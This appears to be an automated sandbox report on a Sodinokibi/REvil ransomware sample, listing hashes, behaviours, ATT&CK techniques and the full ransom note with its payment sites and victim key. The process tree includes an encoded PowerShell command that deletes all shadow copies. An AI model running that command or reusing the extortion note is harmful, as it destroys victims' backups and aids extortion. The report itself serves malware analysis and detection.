Analysis

  • max time kernel
    136s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    27-05-2022 16:55

General

  • Target

    05bce8f9edac7f847b6088fe1d11f5408171ef0da044832ca1a5070710dfbf7f.exe

  • Size

    164KB

  • MD5

    aac59341ab805ecea500e10cd5953628

  • SHA1

    63b389a8f5e35833fdb9f60afb97c99823535803

  • SHA256

    05bce8f9edac7f847b6088fe1d11f5408171ef0da044832ca1a5070710dfbf7f

  • SHA512

    5577a80eed3c6c78a60112a1f916f826fa032e56cc6e596c752d74d404453660358898ba6a4ea6e604917e6f968222d8cd60ddbf69af0a81937473cdfe172c23

Malware Config

Extracted

Path

C:\7j93nd2i-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 7j93nd2i. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/70F5C99751A9DA9A 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/70F5C99751A9DA9A Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 83lqPiQq9l4Jwl/YSDVqPZhLLXQml+VHv9smif4BgstzfCh4E6U8r+2oMDj/JZIz TVwSaTfEc//IW1qKwpLnYcjYQNKsiwdPJTaImYutFv08uCiDohzGCC5zskIJqsbp 2CX3oh4JRBZmbIMtLKtBuImHBu/PyxSCxfbvMoNDNNCFZROz0AwxEu2MEMDeAp2r cIF52q94LaVElKq3JjFAslzmmRbLkdF8JASc+rzKzgeLAW6CXXuzlfWAdFdnoDXt q0DB0gVND2/QpcEMMR/o2LBcnvUVVWR2UHRx/86oassCQ79+CxIAs4nrRG5JaaCC xvtucBxxS5MNc8mvEx7303meXBEqj6xMIPRjERe5MzepLLvcW1RHBf6Eo/n3H2+D NsPHwozxC403FAzXDaioWAxhyNgnGWCxMywDuXmliOjy6gCiqocpNSYpsPwkkrLC fSraK2imDiU4sxpwK4nYBfR8Z8mfHDa+F4UVHEwDYYw/5l/yCoXgkw58/lZVei2H Wm4Ah4Dt1a6Bc70LOuypKc7T/cx3xL+Tv62dzUwaWXz9rnGhAS2bifyIBIoYSgCj LX3KLxWAqMGAmPjOBIInctclvrvPym1zB18F9tDTRsqjcSE107z1mS4QDYuybcpD /yo6EZkAXSTUrPrpydxRWx83a04bfDD6VQyyJBnqwczhkIhFeeEhgRtZKepoF0m9 L1lstqqYA+j40tPcbyAiAjLljctLMutqj7P5ZNuK7tLjW1rHfo2JX5FZUvS8z6J1 7qpw/rPTNgMx6gjSDVWLbWTPB8GWXSH1hnLlYaGpwmFAIPiaMO0fsRLPm+0jHun/ uoHkVebuuXGiav2ekTh+azW4a6YGOOHhxUxaxLDtQs46QCjdt3hD0ezTrrygtv7R Y6uTM9fOiUKZ7jE6Ugv0Dd9OobTUFV431+xTOtNRpBJeKiNf022EwQDm7OL4SA8/ tfG2cjtIszJzu5lk3uc/gb0doLuDP2JUUPePH0E5c2Viey+fi4AUQgV3TijC0gei t3ev0WeZI+q3moW4fj+cvvbPyAtIcKimdrbVkz5y+ZncLNz4Ltw1kGrAkLurLnrp uCuK2asKnbSF/nfvlBcFee46oph9gQUfvIHI7koMORtTqZJTx4TnCaZ83LMLaIa7 E9MfoIybi261svKA Extension name: 7j93nd2i ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/70F5C99751A9DA9A

http://decryptor.top/70F5C99751A9DA9A

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\05bce8f9edac7f847b6088fe1d11f5408171ef0da044832ca1a5070710dfbf7f.exe
    "C:\Users\Admin\AppData\Local\Temp\05bce8f9edac7f847b6088fe1d11f5408171ef0da044832ca1a5070710dfbf7f.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4088
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:5080
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4940

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    3
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4088-130-0x0000000000000000-mapping.dmp
    • memory/4088-131-0x000001EAE21D0000-0x000001EAE21F2000-memory.dmp
      Filesize

      136KB

    • memory/4088-132-0x00007FFAB26E0000-0x00007FFAB31A1000-memory.dmp
      Filesize

      10.8MB

    • memory/4088-133-0x00007FFAB26E0000-0x00007FFAB31A1000-memory.dmp
      Filesize

      10.8MB